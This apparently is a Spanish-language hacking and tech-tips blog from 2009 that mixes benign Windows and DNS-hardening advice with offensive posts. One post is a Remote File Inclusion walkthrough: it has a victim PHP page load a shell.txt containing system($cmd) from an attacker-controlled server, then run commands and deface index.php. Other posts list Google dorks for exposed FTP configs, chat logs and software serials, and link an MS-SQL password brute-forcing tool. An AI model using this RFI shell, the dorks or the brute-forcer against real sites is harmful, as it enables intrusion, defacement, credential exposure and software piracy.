24.12.09

Borrado Seguro .....

Bueno para muchas pesonas es importantisimo esto, y para mi tambien vida jijuemadre es chevere... Porke esimportante, por confidencialidad por saber que realmente si estamos borrando la informacion, hay muchas personas indelicadas en la red que les gustaria hacer publica nuestra info. El post viene netamente por esto, porke pasa mucho en i pais como he visto en otros k llevan a k les reparen su makina y hacen una recuperacion de archivos sea por medio de algunos soft muy conocidos en la escena tal es el caso de RECOVERY MY FILES o EASY RECOVERY DE ONTRACk entre otros, y por medio de eso recuperan informacion legible y ya k si encuentran XXX eso como k les pica la mano y lo hacen publico ajajajajjaja FUCK OFFF................



Se trata de BleachBit una complete herramienta de borrado seguro de datos privados en Windows y Linux. No se trata de la típica herramienta que borra el historial, las cookies, favoritos… de IE y Firefox, BleachBit va mas allá es capaz de limpiar las configuraciones de los programas:

Adanaxis
Adobe Reader
aMSN
aMule
APT
Audacious
Bash
Beagle
Chromium
Downloader for X
Deep scan
Easytag
ELinks
emesene
Epiphany
Evolution
Exaile
Filezilla
Firefox
Flash
gedit
gFTP
GIMP
GL-117
GNOME
GNOME Art
Google Chrome
Google Earth
Google Toolbar
gPodder
Gwenview
Hippo OpenSim Viewer
Internet Explorer
Java
KDE
Liferea
Links 2
Metacity
Microsoft Office
Midnight Commander
Miro
MySQL
Nautilus
Nexuiz
Notify OSD
OpenOffice.org
Opera
PDFedit
Phatch
Pidgin
PlayOnLinux
RealPlayer
Recoll
Rhythmbox
rpmbuild
Safari
SeaMonkey
Second Life Viewer
Skype
sqlite3
System logs
System
TeamViewer
Thumbnails
Transmission
Tremulous
VIM
Virt-Manager
Vuze / Azureus
Winamp
Windows Defender
Windows Explorer
Windows Media Player
WINE
winetricks
WinRAR
X11
XBMC Media Center
XChat
Xine
X-Moto
Yahoo! Messenger
yum
Zsh

Entre sus características destaca:


Mejora el rendimiento de Firefox filtrando la base de datos del historial.
Elimina los datos de paquetes de la cache en: CentOS, Fedora y Red Hat.
Limpieza datos de APT para: Debian, Ubuntu, Kubuntu, Xubuntu, y Linux Mint.
Eliminar idiomas que no se usan en distribuciones Linux.
Tiene actualizaciones continuas que mejoran su efectividad.

BleachBit es la herramienta perfecta para limpiar el sistema de datos privados ocultos cuando no se quiere borrar el contenido, ni el sistema del disco duro.

Más información y descarga:

BLEACHBIT DOWNLOAD

29.11.09

DESHABILITAR ESCRITURA EN PENDRIVE PARA WINDOWS

La forma más sencilla que hemos encontrado es ejecutar este .reg:

(deshabilitar)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies]
"WriteProtect"=dword:00000001

(habilitar)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies]
"WriteProtect"=dword:00000000

Que funciona tanto para winXP como para Win2K, independientemente de que el equipo esté unido al dominio. Una vez añadida la clave al registro, el pendrive se montará en modo sólo lectura y, también importante, los teclados USB funcionan perfectamente tras la modificación.

El usuario del dominio, obviamente, no tiene permisos para añadir este .reg, así que debe ser ejecutado como admin local, lo cual puede hacerse desde el DC (Controlador de Dominio).

Finalmente, si queremos añadir la clave de registro desde un .bat lo haremos así: REGEDIT /S archivo.REG.

19.11.09

Drivers de dispositivos no Reconocidos

lo que hay que hacer es identificar el id del device y vendor
para poder buscar los drivers...
En ejecutar colocamos: compmgmt.msc

Al supuesto driver no encontrado le damos clic
nos va a aparecer un cuadro y vamos a la solapa
detalles.



hai es como vemos los id de vendor y device
como en la imagen

PCI\VEN_10DE&DEV_03EB&............

osea...
VEN_10DE = Vendor id 10DE
DEV_03EB = Device id 03EB
una ves que los tenemos.. nos vamos a

http://www.pcidatabase.com/

donde completamos los ids, de nuestro dispositivo
y vemos si los encontro o nos da el nombre x lo menos :)
ahora es cosa de comenzar la busqueda o ir a la pagina del fabricante
para descargarlo

17.11.09

Desblock en cola de impresion

Bueno esto pasa a menudo en las enterprises je xD, y ps mas a uno con esas shit de impresoras, aka os pondremos un codiguillo el cual le deben de cojer y colocar en extension .bat, para los k no sepan seria cojer el codigo ponerlo en bloc de notas y luego archivo guardar como, y cuando se pone el nombre ponerle luego (.bat) de esa forma nos keda un archivito ejecutable por lotes k nos hara esa tareita.

Es muy común en Windows que la cola de impresión se descontrole y acaba bloqueándose cuando intentamos imprimir un documento, y que después nos sea imposible eliminar el trabajo y al final tengamos que reiniciar el sistema. PAra no reiniciar has esto....

net stop spooler
del /q %SystemRoot%\system32\spool\printers\*.*
net start spooler


El nombre le pueden poner lo k sea ejm: Malditaimpresorakeseblokea.bat jajaj mentiras uds veran jaaj

Limpiar Temporales, cookies, historial, desde simbolo de sistema

Una vez un gran amigo (Juancho de Sys-teamsecurity) y por cierto compañero de trabajo desde hace un tiempo, me decia... Hey Fl4m3b, Ayudame con esto y esto es esto ajajjaja mentiras es un disparate pero bueno el caso es k el necesita para ser mas rapido eliminar los temporales de el explorador mas rapidamente... Bueno esto servira en especial pa un InetExplorer 7....

Bueno esto es

- Elimina los archivos temporales de Internet.

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 8

- Elimina las cookies.

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 2

- Elimina el Historial.

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 1

- Elimina los datos de los formularios.

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 16

- Elimina los passwords almacenados.

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 32

- Elimina todo.

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 255

- Elimina todo, incluso los ficheros borrados.

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 4351

Bueno Podran cojer estos codigos copiar y pegar y luego meterlos en un bloc de notas y guardarlo con extension bat

y Funcionara Coool

Agujero de seguridad en Windows Vista y Windows 7 que permite reiniciar el ordenador de forma remota

Según comentan desde Heise Security se ha descubierto una vulnerabilidad en la implementación del protocolo SMB2 de Microsoft que puede ser explotado de forma remota por atacante para bloquear o reiniciar los sistemas operativos Windows Vista y Windows 7.

Según comentan el problema está relacionado con un error en la forma en que el driver srv2.sys maneja las solicitudes de los cliente cuando, concretamente cuando la cabecera del proceso de alta contiene un símbolo de ampersand.


El ataque puede ser explotado sin necesidad de estar autenticado, simplemente con que el puerto 445 del sistema destino este accesible es posible realizar el ataque, cosa que sucede por defecto en la configuración de red local de Windows.

Actualmente ya circula por Internet este exploit que está escrito en Python y que explota está vulnerabilidad. Está vulnerabilidad también ha sido confirmada por Heise Security, desde donde comentan que el exploit sólo ha funcionado sobre un Windows Vista, y que no tuvo ningún éxito sobre Windows 7.

Desde Microsoft aún no han publicado una actualización oficial que resuelva está vulnerabilidad, por lo que la única solución es cerrar los puertos SMB, marcando las casillas tanto para el acceso a archivo, como para el acceso a la impresora en la configuración del firewall.

Visto en: Hole in Windows Vista and 7 allows remote reboot.

4.11.09

G Data presenta un estudio sobre seguridad en Windows 7

La compañía G Data, acaba de realizar un estudio de choque de Windows 7 y según sus conclusiones el sistema operativo Windows 7 tiene agujeros de seguridad.

Según explica el director del Laboratorio de Seguridad de G Data, Ralf Benzmüller fallan el firewall o el control de cuentas de usuarios, entre otros en el nuevo Windows 7.

Según el test del especialista, falla el control de cuentas de usuarios, que es vulnerable, y los mecanismos de protección Windows Firewall y Windows Defender son "insuficientes" y "provocan una falsa sensación de seguridad".

Además, la compañía señala que aunque útiles AppLocker y Bitlocker sólo están disponibles para las versiones business del producto.

Igualmente, G Data critica que la extensión de los archivos continúe oculta para los usuarios, lo que continúa facilitando el trabajo de los cibercriminales.

Y concluyen en su análisis de la nueva versión, "Windows 7 ha ganado algunas funciones de protección. Pero no se ha producido un progreso real en relación a Vista".

Fuente:
G-DATA

25.8.09

Google el del pueblo!!!

Aki se pondran una seria de scripts k hacen de google un gran buscador:

Ver ficheros k contienen nombres de usuario:
filetype:conf inurl:proftpd.conf -sample

Obteniendo logs o info Adulterada mentiras algo sensible:
"Index of" / "chat/logs"

Buscar Seriales:
"Adobe PhotoShop" "Belarc Advisor Current Profile" key:
Nota: Lo k dice en las primeras comillas se cambiara por el Soft k uds buscan.. Es todo y hace unas buskedas lindas xD otro ejm ps pa la hp gente k no entiende:
"Windows XP Professional" "Belarc Advisor Current Profile" key:

Bajando musik desde el buscador:
intitle:index.of "tipo de archivo" +"que quieres buscar" -htm -html -php -asp
El ejm concreto seria:
intitle:index.of "mp3" + "zona ganjah" -htm -html -php -asp
Y asi pueden ser grupos como callejeros bulldog jaja mentiras cada kien con su estilo

Pronto mas aventuras Googleanas

RFI para la sociedad jej xD Saludos

Introduccion:

Esta vulneravilidad solo existe en Paginas programas en PHP, que te permite agregar enlaces a archivos remotos situados en otros servidores o paginas web, esta vulneravilidad es provocada por una mala programacion o un error al programar,En la cual Puedes entrar a muchos lados con los comandos.

La pagina puede ser vulnerable a ataques RFI si la url es masomenos similar a esta que tenemos aqui:

http://[servidor_victima]/index.php?.

Para obtener la shell de la web solo necesitamos este codigo:

http://[web o url de la web]/index.php?page=http://[web o servidor del atacante]/shell.txt&&cmd=ls.

Esa seria una web vulenerable.

Ejemplo:http//ww.rush.com/index.php?

Para poder hacer un ataque RFI tendremos que hacer esto:

http://www.rush.com/index.php?page=http://www.rushhack.com/shell.txt?&cmd=(comando)

Para saber si es vulnerable en el block de notas pegas esto


system($cmd)

?>

aora lo guardamos con el nombre de shell.txt y lo subomos a un servidore, de preferencia que no sea php para que no se ejecute en tu servidor.

Oora procedemos a usar esto:

http://www.rush.com/index.php?page=http://www.rushhack.com/shell.txt?&cmd=(aqui va el comando.)

y listo asi explotaran el comando.

Un ejemplo de una shell explotada:

http://www.rush.com/index.php?page=http://www.rushhack.com/shell.txt?&cmd=pwd

pwd�??> nos muestra en que parte del servidor estamos por ejemplo:

Home/host/www

Una Shell para sobreescribir un archivo es:

/shell.txt?&cmd=Defaced By: rUsH >index.php.

Para ejecutar mas de un comando solo usen esto “;�?

/shell.txt?&cmd=[coamando];[Comando];[Comando]

Solo prodran sobreescribir si tiene permiso, para saber en que tienes permiso para modificar usa este comando

/shell.txt?&cmd=ls -la �??> y te mostrara los permisos con sus respectivos archivos

Para saber los datos de la DB usa este comando:

/shell.txt?&cmd=cd

Es todo.

By:rUsH

Attack DNS??? umm y D.O.S

1. DoS contra el servidor de nombres
2. Ataque de DNS Amplification
3. Servidores vulnerables
4. Impacto Potencial
5. Recomendaciones
6. Conclusiones
7. Faq
8. Referencias

1. DoS contra el servidor de nombres

De forma general, los ataques de negación de servicio pretenden sobrecargar las redes y servidores con un conjunto de solicitudes o respuestas con el fin de sacar de operación a dichos servicios.

La tendencia en el uso de ataques de negación de servicio a través del uso de peticiones spoof al DNS en últimas fechas ha visto un incremento de consideración, este problema es fundamental tomando en cuenta que muchas de las comunicaciones en internet hacen uso del DNS.



2. Ataque de DNS Amplification

El atacante envía una alta cantidad de peticiones con una dirección IP falsificada (spoof) al DNS que permite recursión, el DNS procesa estas peticiones como si éstas fueran válidas mandando una respuesta al sistema al cual se quiere atacar, es decir al sistema víctima. Cuando estas peticiones alcanzan un volumen importante pueden inundar al sistema víctima de repuestas del DNS a las peticiones que se le realizan. Este ataque es llevado a cabo gracias a errores en la configuración del DNS y es llamado amplification puesto que los DNS al reflejar el ataque, potencian el nivel de éste hacia un blanco en especifico a causa de que las respuestas del servidor de nombres son de un tamaño considerablemente mayor que las peticiones que se le realizan causando con esto, en ocasiones, la caída del servicio y con ello la negación del mismo.



3. Servidores vulnerables

Los ataques de este tipo son susceptibles de ser exitosos en servidores de nombres de dominio en los cuales la recursión esté activada; esto es en una inmensa mayoría de los servidores de este tipo. Para hacer una detección exitosa de este tipo de servidores se puede hacer realizando un escaneo con ciertas herramientas las cuales nos indican el nivel de recursión que implementan los servidores de dominio. Algunas de estas son :

*

DNSCheck

Esta herramienta web nos indica el nivel de recursión implementado en lo servidores de nombre que se hayan especificado a través del nombre del dominio

http://dnscheck.se/
*

dlint

Herramienta libre que pude ser de utilidad al indicarnos las subzonas de un dominio en específico, indicándonos si en ésta se lleva a cabo la recursión o no.

4. Impacto Potencial

La potencialidad de este ataque es de dimensiones sumamente grandes puesto que la mayoría de los servidores de nombre en internet tiene un problema en cuanto a la configuración de la recursión (que se describe en la sección siguiente), causa por la cual un ataque coordinado podría tener consecuencias desastrosas con incluso la caída de internet o la negación de servicio en muchos de sus servidores de nombres. El aumento en este tipo de prácticas nos da una idea y una base fundamentada para tomar medidas precautorias que nos ayuden y preparen para un ataque de estas magnitudes



5. Recomendaciones

En un sentido más amplio, la recursión es completamente inevitable puesto que al desaparecer esta, la razón de ser y la utilidad del DNS pierde la funcionalidad casi por completo. Esto se debe a la necesidad en el sistema de nombres de consultar a distintos servidores DNS puesto que la mayoría de las veces el DNS autoritativo para nuestro dominio no tendrá la respuesta a nuestra consulta y tendrá que preguntar en forma recursiva a partir de los DNS raíz hasta encontrar el DNS que pueda resolver nuestra consulta. Es decir, en estricto sentido la recursión no es ningún error de configuración. Se convierte en error al tiempo de que no se restringe la recursión en el servicio de nombres a solo una lista de solicitantes en los cuales confiamos. Una práctica de configuración ampliamente recomendable sería el permitir la realización de consultas recursivas solo a un grupo específico de direcciones IP. Si bien el riesgo no es completamente eliminado si logramos mitigar en gran medida la posibilidad de ser víctimas de una práctica maliciosa de este tipo.

Por otra parte una regla que debe aplicarse para minimizar el riesgo de DNS amplification es la del mínimo privilegio, esto es, un DNS no tiene que permitir la recursión a nadie mas que a los host estrictamente indispensables. Si nuestro DNS no tiene la necesidad de realizar consultas recursivas, puesto que no tenemos un dominio de menor jerarquía al cual permitirle la recursión, no existe la necesidad de permitirla o, en el caso de que tengamos ciertos dominios de mas baja jerarquía, debemos permitir la recursión solo a los hosts en los cuales tengamos confianza.

Ahora bien, ¿por qué limitar la recursión?. Si hasta ahora permitimos en nuestros servidores de nombres la recursión ilimitada (es decir, permitimos las consultas recursivas sin validar antes quién nos las está solicitando), estamos aumentando la posibilidad de que nuestro servidor DNS sea utilizado para hacer ataques de DoS ya que al no validar cualquier host puede realizar consultas falsificando la IP redirigiendo un ataque amplificado hacia cualquier objetivo de la red. Por otro lado, al configurar nuestro servicio de nombres restringiendo las IPs que nos pueden realizar consultas recursivas lo que hacemos es que nuestro servidor no podrá ser utilizado para llevar acabo ataques DoS a menos que se logre la falsificación de una de las IPs a las cuales tenemos otorgado el permiso de recursión

A continuación se describe quién se vería afectado y de que manera en el caso de una restricción de la recursión en un DNS.

En el caso de que se realice una restricción de la recursión, se verán afectados aquellos usuarios de nuestro DNS los cuales salgan del rango de IPs que nosotros tengamos configuradas. En este caso se verán afectados puesto que no les será posible acceder al servicio de nombres, cuando menos a partir de nuestro servidor DNS.

Todos los usuarios que tengan una IP que pertenezca al rango establecido en la configuración previamente mencionada no se verán afectados de ninguna manera puesto que el servicio de DNS les seguirá siendo proporcionado sin diferencia alguna.

5.1 Ejemplos de configuración recomendada (eliminar recursión)

5.1.1 Bind 8/9

En el siguiente ejemplo tenemos la configuración deseable (en BIND 8/9) para un servidor de nombres el cual no tiene ningún dominio de menor jerarquía al cual tengamos estrictamente que permitirle realizar consultas recursivas

options {

directory "/var/named";

recursion no;

};

5.1.2 Microsoft DNS

En el caso de Microsoft DNS se realizaría añadiendo un registro de tipo REG_DWORD llamado NoRecursion con el valor 1.a la siguiente llave del registro

HKEY_LOCAL:MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters

5.2 Ejemplos de configuración recomendada (limitar recursión)

5.2.1 Bind 8/9

El siguiente ejemplo es útil en el caso en que tengamos dominios de menor jerarquía a los cuales tengamos que permitirles la recursión siempre y cuando esos hosts sean de nuestra confianza (BIND 8/9).

acl recurseallow { x.x.x.x; y.y.y.y; z.z.z.z; };

options {

directory "/var/named";

allow-recursion { recurseallow; };

};

5.2.2 Microsoft DNS

En el servidor de DNS de Microsoft Windows 2000 no existe manera conocida para hacer un bloqueo discriminatorio entre las IPs a las cuales otorgarles la recursión y a cuáles no. Es decir, la única manera que resultaría efectiva sería definir reglas en un firewall que bloqueen el protocolo UDP por el puerto 53 de entrada y arriba del 1023 de salida para las IPs que no tengamos contemplado permitirles la realización de queries.

* Referencia: Building Internet Firewalls 2da edición





6. Conclusiones

La recursión en el servicio de nombres no puede ser eliminada pero si puede ser controlada a través de la correcta configuración de los hosts a los cuales les es permitido hacer consultas recursivas en nuestro DNS. Si bien esto no elimina el riesgo de que nuestro DNS pueda ser usado como amplificador de recursión, sí disminuye el riesgo de manera considerable.

¿Porque no se elimina el riesgo?

El riesgo no se puede eliminar por el hecho de que siempre existe la posibilidad de que un atacante falsifique alguna IP para la cual nuestro servidor de nombres permite las consultas recursivas haciendo que el riesgo siempre esté latente. ¿Puede nuestro servidor ser víctima de la amplificación en la recursión producto del ataque a otro servidor DNS?

Si bien se puede mitigar el riego de que nuestro servidor lleve a cabo ataques a partir de la amplificación de recursión, nuestro servidor no puede ser responsable de la correcta configuración de los servidores que puedan llegar a realizar peticiones. Es decir , nuestro servidor puede ser víctima de un ataque de amplificación aun cuando en nuestro servidor no existan errores en la configuración, ya que las peticiones enviadas serían procesadas como válidas.

Existen medidas que pueden ayudarnos a contrarrestar este tipo de acciones utilizando herramientas de detección de peticiones provenientes de IPs falsificadas (spoof) por ejemplo basadas en el calculo del TTL (tiempo de vida) de los paquetes. Un ejemplo de una herramienta de este tipo es despoof, herramienta para el servidor de nombres BIND.

7.FAQ

1 ¿A quien permitirle la recursión?

Es recomendable permitir la realización de consultas recursivas solo a aquellos hosts en los cuales confiamos o es indispensable proporcionar el servicio. Por ejemplo, en el caso de una universidad, solamente a las IPs que tengamos asignadas.

2 ¿En que casos es recomendable bloquear por completo la recursión?

En los casos en los cuales nuestro dominio no tenga un dominio de menor jerarquía al cual debamos permitir la recursión. Es decir, en la estructura jerárquica del DNS las hojas de ese árbol tendrían que tener la recursión bloqueada.

3 ¿Es indispensable la recursión?

La recursión en las consultas al DNS se vuelve indispensable ya que el DNS en su conjunto es una base de datos distribuida, eso significa que no todos los datos que queremos obtener van a estar siempre en nuestro servidor predeterminado, por lo cual es necesario que nuestro servidor haga consultas a otros DNS para obtener la información de nuestro interés.

4 ¿Porque se produce una Negación de Servicio con este ataque?

Esto se debe a que el servidor DNS produce una respuesta mucho más grande en comparación con las peticiones que recibe. Estas respuestas en cantidades considerables pueden llegar a bloquear la actividad de otra máquina además de afectar el ancho de banda de la red en la que se produzca el ataque

7.8.09

Bueno compas a conocer ke es LOPD ...

La Ley Orgánica 15/1999 de 13 de diciembre de Protección de Datos de Carácter Personal, (LOPD), es una Ley Orgánica española que tiene por objeto garantizar y proteger, en lo que concierne al tratamiento de los datos personales, las libertades públicas y los derechos fundamentales de las personas físicas, y especialmente de su honor, intimidad y privacidad personal y familiar.

Su objetivo principal es regular el tratamiento de los datos y ficheros, de carácter personal, independientemente del soporte en el cual sean tratados, los derechos de los ciudadanos sobre ellos y las obligaciones de aquellos que los crean o tratan.

Mas info:

LOPDDDDDDDD

Waa LOPD

Saludos y ps mucha energia con esto LOPD aguante VIVELA-UNDER

3.8.09

piggy - Download MS-SQL Password Brute Forcing Tool

Este es un excelente soft un desembale el HP, bueno lean dejen la maric*** Aki medio se explica como la estructura del soft

es otra herramienta para realizar ataques a contraseñas en línea que conjetura contra los servidores de Microsoft SQL.

Apoya los servidores múltiples de la exploración usando un archivo de diccionario o un archivo con cuentas predefinidas (las combinaciones del username y de la contraseña).

Es una herramienta simple bonita y tiene una verson binaria Win32 - es una línea de comando herramienta sin embargo.

Bueno aqui se da como una explicacion.. Seria ke lo pongamos en C: por ejm, y luego lo llamamos desde el PROMPT o CMD, y luego se llama por las funciones, bueno ps explico porke muchos no saben como hacerlo

Piggy v1.0.1 by patrik@cqure.net
--------------------------------
usage: piggy [options]

options:
-u [username] - Single username
-p [password] - Single password
-s [server] - Single server
-S [srvfile] - File containing ip/hostnames
-D [dicfile] - File containing passwords
-A [accounts] - File containing username;password combinations
-N - Do not check availability before scan
-v verbose - Verbose logging

Puedes descargarlo aquí:
http://www.cqure.net/tools/piggy-src-1_0_1.zip
http://www.cqure.net/tools/piggy-win32-1_0_1.zip

Saludos Flameb, cualkier duda atento

Posicionamiento Web !!!! Kizas a mucho les importe ami me vale SHIT

Bueno Este post ahi pa el OSORNO-Edatel gran pana ahi dedicado jaja..... Saludos ojala y les sirva a todos, Ami por ejm esto me vale un monton de mierda no me gusta... Pero a muchos si les importa

Dar de alta en google y en otros

Aunque google no asegura que tu url la va a indexar mándala varias veces no te penaliza ni nada, también es importante darla de alta en otros buscadores aunque es cierto que q la mayoría usa google no esta de mas también inscribirlo en otros:
google
http://www.google.com/intl/es/addurl.html
msn
http://search.msn.com/docs/submit.aspx
yahoo altavista
http://es.altavista.com/addurl/default

DMOZ : Open Directory Project

DMOZ : Open Directory Project , ODP , o algunos le llaman directory de mozilla.
Para aparecer en los primeros lugares en google tienes que estar en ese directorio porque es donde se basa para listar las Webs
Intenta inscribirte realmente es difícil pero si lo consigues será un grande logro
¿nada mas google? no la mayoría AOL Search, Lycos, HotBot, DirectHit y otros cientos más

Dmoz.org
Es un directorio de webs creado por Netscape y AOL se divide en idiomas países categorías se basa en usuarios editores como la Wiki puedes entrar como editor pero no es necesario para que te agreguen tu Web al ser como la wiki existen parecidos problemas editores malos etc.

DMOZ es gratis y no lo confundas no es buscador aunque tiene uno pero solo es interno
es un directorio y es totalmente gratis aparecen sitios basura en DMOZ pero porque lleva varios años online desde 1998

Recomendaciones de tu Web
tiene que estar bien hecha no la clásica que parece geocities de hace 15 años no un myspaces spacelive tener dominio propio Web terminada:

Ejemplo no próximamente y que algunos link están muertos tu Web tiene q estar bien hecha accesible y no confusa para tus visitantes
si esta hecha con algún script prefabricado dejarle los créditos sin faltas de ortografía sugiérelo en la categoría correcta si algún sitio de tu competencia (temática) esta ve que categoría es y ahí inscribe tu Web no la mandes varias veces por que los editores se molestan y no la mandas en cada categoría mándala en una y los editores si ven que podría tener doble triple etc. la pondrán existen rumores que algunos editores cobran por aceptarte la Web si detectas algún abuso en el DMOZ Escribe en http://dmoz.org/cgi-bin/feedback.cgi

Como sugerir un sitio a DMOZ
fuente:http://www.dmoz.org

Paso1

¿Cómo agrego un sitio al Open Directory Project?

Agregar un sitio es fácil. Simplemente siga estas instrucciones.
Cómo sugerir un sitio a Open Directory

* No envíe sitios espejo. Sitios espejo son aquellos que tienen un contenido idéntico pero con URLs distintos.

* No envíe URLs que contengan únicamente el mismo o similar contenido que otros sitios que puedan estar listados en el directorio. Sitios con contenido coincidente y repetitivo no son útiles para los usuarios del directorio. Múltiples envíos del mismo sitio o de sitios relacionados puede producir que sean excluidos y/o borrados estos sitios y todos sus afiliados.

* No disfrace sus envíos para sugerir el mismo URL más de una vez.
Ejemplo:
http://www.dmoz.org
http://www.dmoz.org/index.html

* No envíe ningún sitio con una URL que redireccione a otra distinta.

* El Open Directory tiene una política contra la inclusión de sitios con contenido ilegal. Ejemplos de material ilegal incluyen pornografía infantil, difamación, materiales que infrinjan algún derecho de la propiedad intelectual y material que específicamente apoye, solicite o ampare actividades ilegales (como el fraude o la violencia).

* No envíe sitios "En construcción". Espere hasta que el sitio esté terminado antes de enviarlo. Sitios incompletos, con avisos "En construcción" o que contengan gráficos o enlaces rotos no son buenos candidatos para el directorio.

* Envíe los sitios de pornografía a la categoría apropiada dentro de Adult.

* Envíe los que no están en inglés a la categoría apropiada dentro de World.

* No envíe sitios compuestos mayoritariamente por enlaces afiliados.

Paso 2

Realice una búsqueda rápida en el directorio en dmoz.org para asegurarse de que su sitio no está ya incluido. De esta forma todos ahorraremos tiempo.

Paso 3

Identifique la categoría (una sola) que mejor defina su sitio. El Open Directory posee una enorme variedad de temas entre los que elegir. Deber enviar su sitio a una única categoría, la que sea más relevante. Los sitios enviados a categorías inapropiadas o no relacionadas pueden ser rechazados o eliminados.

Nota: algunas categorías no ofrecen los enlaces "Sugerir URL" o "Actualizar URL". Estas categorías no aceptan envíos, por lo tanto debería encontrar una categoría más específica para su sitio.

Paso 4
Una vez que ha seleccionado la mejor categoría para su sitio, vaya directamente a esa categoría en dmoz.org y entonces utilice "Sugerir URL". Siga las instrucciones del formulario de envío cuidadosamente. La descripción debería informar del contenido del sitio de forma concisa y precisa. No deben ser de naturaleza promocional.
Enviar una descripción promocional en vez de una objetiva y bien escrita puede retrasar significativamente el listado de su sitio o impedir totalmente que sea listado.
El software para el envío automático de sitios es (y siempre ha sido) una violación de este proceso. Los sitios enviados automáticamente son marcados y después de aceptarse el envío, borrados sin notificárselo. Los envíos automatizados enviados de forma persistente nos obligarán a excluirle de dmoz, así podremos ofrecer los recursos a personas reales.

Un editor de ODP revisará su envío para determinar si se incluirá en el directorio. En función de distintos factores como el volumen de envíos a una categoría en particular, puede llevar hasta varias semanas o más antes de que su envío sea revisado. Por favor envíe cada URL al Open Directory una sola vez. Le repetimos que el envío reiterado del mismo o de sitios relacionados puede conllevar la exclusión y/o eliminación de ésos y todos los sitios afiliados.
Disfrazar su envío y sugerir la misma URL más de una vez no está permitido.

Actualizar su sitio
Si un sitio ha sido aceptado en el directorio pero no está satisfecho con la descripción o el título del sitio, puede ir a la categoría donde está listado y rellenar el formulario "actualizar URL". Si no está satisfecho con la categoría donde su sitio está listado, puede enviar un email a un editor de la categoría explicando su desacuerdo. Sea civilizado y educado, los comportamientos amenazadores u ofensivos no serán tolerados.

Si (y sólo si) no está de acuerdo con la respuesta del editor, puede usar el enlace "reportar abuso/spam" en la parte superior de la página para recurrir la decisión del editor. Sea concreto con respecto a su desacuerdo (incluyendo por qué piensa que la respuesta del editor es inadecuada). Los comentarios realizados por medio del enlace "reportar abuso/spam" son revisados por el staff del ODP, que tomará la decisión final. Por favor, NO envíe mensajes a Netscape, eso sólo retrasará y complicará el proceso. Nos tomamos muy en serio las observaciones y les prestamos gran atención. Pero recuerde que debemos mantener nuestro criterio y realizar numerosos juicios sobre cómo hacer el ODP tan útil como sea posible, independientemente de la decisión que tomemos, no conseguiremos satisfacer siempre a todos.
Posicionando su sitio en portales y motores de búsqueda que utilizan los datos del ODP

Si su sitio ha sido aceptado en el Open Directory, puede tardar de dos semanas a varios meses en ser listado en los sitios que utilizan los datos del ODP, como por ejemplo AOL Search, Google, Netscape Search, Yahoo Search, y otros cientos de sitios. Actualizamos los datos disponibles semanalmente, pero cada uno de estos sitios tiene su propio calendario de actualizaciones.

Criterio editorial
Procedimiento una vez que ha sugerido su sitio
Por favor, comprenda que hacer del ODP un recurso valioso, requiere que apliquemos nuestro criterio editorial para determinar el contenido y la estructura del directorio. Ese criterio se extiende (pero no se limita) a qué sitios incluir, dónde se colocan los sitios dentro del directorio, cuándo y si procede incluir más de un enlace a un sitio, cuándo son apropiados los enlaces profundos y el contenido del título y la descripción del sitio. Además, la situación de un sitio en el directorio es susceptible de ser modificada y borrado en cualquier momento a nuestro único criterio. No debería dar por supuesto que un sitio será incluido en el directorio. Por favor, comprenda que al aplicar el criterio de edición puede que no se trate por igual a todos los envíos. Puede que no coincida siempre con nuestras decisiones, pero esperamos que se dé cuenta de que hacemos todo lo que podemos para tomar decisiones justas y razonables.
El equipo del Open Directory agradece comentarios y observaciones sobre el directorio en general. Por favor muéstrenos su opinión y cómo podemos mejorar el servicio. Muchas gracias.
Vaya a la página inicial del Open Directory en dmoz.org - comience aquí la búsqueda de la categoría a la que realizar su envío.

¿Cuánto tiempo tarda mi sitio en ser listado?
Dependiendo del nivel de actividad de los editores en su área, pueden pasar dos semanas o más hasta que su sitio sea revisado. Aunque el ámbito y la cobertura del directorio sean tan extensos, tenemos muy en cuenta la calidad de ODP y estamos orgullosos de ser muy selectivos. No aceptamos todos los sitios, por lo tanto, si el suyo no es aceptado, por favor no se lo tome como algo personal. Nuestra meta es hacer un directorio tan útil como sea posible para nuestros usuarios, no servir como herramienta promocional para las entidades listadas ni incluir en el directorio todas, ni siquiera la mayoría de las páginas que posiblemente podrían ser listadas.

¿Tiene el ODP un servicio urgente que permita que mi página sea listada en menos tiempo?
El ODP no tiene un servicio urgente similar a otros directorios comerciales, sin embargo, hay varias cosas que puede hacer para ayudar a que la revisión de su solicitud sea rápida. Primero, siga cuidadosamente las normas de envío.
Segundo, debería revisar algunas de las políticas editoriales que usamos para listar los sitios. Una solicitud bien escrita y meditada tiene más posibilidades de ser revisada antes que una descuidada.
Sin embargo, no recomendamos sugerir un sitio en varias categorías distintas con la esperanza de que acabe siendo listada en una o dos de ellas. Con esto, no conseguirá que Web sea listada antes, de hecho puede retrasar significativamente el proceso. Esto puede ser interpretado como spam y que al final su sitio no sea listado.

¿Cómo consigo que listen mi sitio en más de una categoría?
Debería sugerir su sitio a una única categoría, la que considere más apropiada con sus contenidos. Por favor, sugiera su página una sola vez. Los editores de ODP se reservan el derecho de determinar en qué categoría o categorías será colocado su sitio utilizando su criterio editorial.

¿Cuánto tiempo tarda en aparecer mi sitio en los motores de búsqueda que usan los datos de ODP como AOL Search y Netscape Search?
Una vez que su sitio ha sido listado en ODP, puede tardar dos semanas o más en aparecer en los motores de búsqueda que utilizan los datos de ODP. Es responsabilidad de esos buscadores utilizar la última versión de nuestros datos. ODP no tiene ningún control sobre cuándo terceras partes actualizan los datos provenientes de ODP.

¿A quién le pido ayuda sobre mi sitio y sobre la categoría más apropiada para que sea listado?
Si después de explorar el enorme árbol de categorías, todavía no está seguro de dónde debería enviar su sitio, la mejor opción es sugerirlo en la categoría que piense que mejor refleja sus contenidos. Los editores tienen la capacidad de mover su sitio a otra categoría diferente o de crear una nueva si hiciera falta.

¿Qué debería hacer si la categoría a la que quiero enviar mi página no tiene un enlace "Agregar URL"?
